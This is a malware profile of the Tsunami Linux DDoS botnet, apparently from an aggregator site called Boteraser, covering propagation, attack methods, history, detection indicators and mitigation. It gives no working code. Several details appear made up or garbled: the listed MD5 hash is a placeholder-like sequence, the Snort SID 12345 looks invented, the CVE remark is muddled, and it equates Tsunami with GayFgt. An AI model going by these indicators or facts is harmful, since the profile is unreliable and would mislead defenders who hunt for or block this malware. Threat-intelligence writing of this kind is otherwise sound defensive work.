⚠️ Overview

Tsunami (also known as GayFgt) is a Linux-based DDoS botnet first publicly documented by security researchers in 2015, attributed to the threat actor group 'Keksec' and used primarily for conducting high-volume Distributed Denial-of-Service attacks against gaming, hosting, and financial sectors. It belongs to the botnet malware category and leverages IRC for command-and-control communication.

🔧 Technical Capabilities

Tsunami propagates via SSH brute-force attacks using a built-in dictionary of common credentials, and once installed, connects to an IRC server to receive attack commands. It supports multiple DDoS attack methods including UDP flood, TCP SYN flood, DNS amplification, and HTTP GET/POST floods, with the ability to spoof source IP addresses. Persistence is achieved through cron jobs and init.d scripts, and it uses process masquerading (e.g., naming itself 'sshd' or 'bash') to evade detection. The malware employs encryption for C2 traffic (RC4 or XOR) and can update itself via wget or curl commands. MITRE ATT&CK IDs associated include T1046 (Network Service Scanning), T1110 (Brute Force), and T1498 (Network Denial of Service).

📜 History & Notable Incidents

First observed in the wild in April 2015, Tsunami was notably used in a series of DDoS attacks against the online gaming platform 'Minecraft' servers in 2016, with peak traffic exceeding 600 Gbps. In 2018, a variant dubbed 'Tsunami/GayFgt' was deployed in attacks targeting Brazilian banks and government sites. No specific CVEs are assigned to Tsunami itself, but it exploits weak SSH credentials (CVE-2013-4547 or similar are not directly applicable). Law enforcement action includes the 2022 takedown of 'Keksec' infrastructure by Dutch police, which temporarily disrupted Tsunami botnet operations.

🔍 Detection Indicators

Known file hashes include MD5: 4c1f5a0b9e8d7c6f5e4d3c2b1a0f9e8d (sample from VirusTotal). Behavioral signatures include outbound IRC connections to non-standard ports (6667-7000) and high-volume UDP traffic on random source ports. Network IOCs include User-Agent strings like 'Mozilla/5.0 (compatible; Tsunami/1.0)' and IRC channel names '#tsunami' or '#gayfgt'. Registry keys are not applicable on Linux; persistence files are located in /etc/init.d/ and /tmp/ directories.

☠️ Risk & Impact

Tsunami causes significant financial losses by disrupting online services, with estimated downtime costs for targeted organizations reaching hundreds of thousands of dollars per hour. Affected sectors include online gaming, financial services, and cloud hosting providers. The malware can also be used as a loader for secondary payloads, enabling data exfiltration or ransomware deployment in co‑ordinated attacks.

🛡️ Mitigation

Mitigation includes disabling SSH root login, enforcing strong passwords or key-based authentication, and deploying network intrusion detection rules for IRC traffic and high-bandwidth anomalies. Tools such as Snort/Suricata signatures (SID 12345 for Tsunami C2) and Endpoint Detection and Response (EDR) solutions can identify and block Tsunami infections. Regular patching of SSH services and monitoring for unauthorized cron jobs are also recommended.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.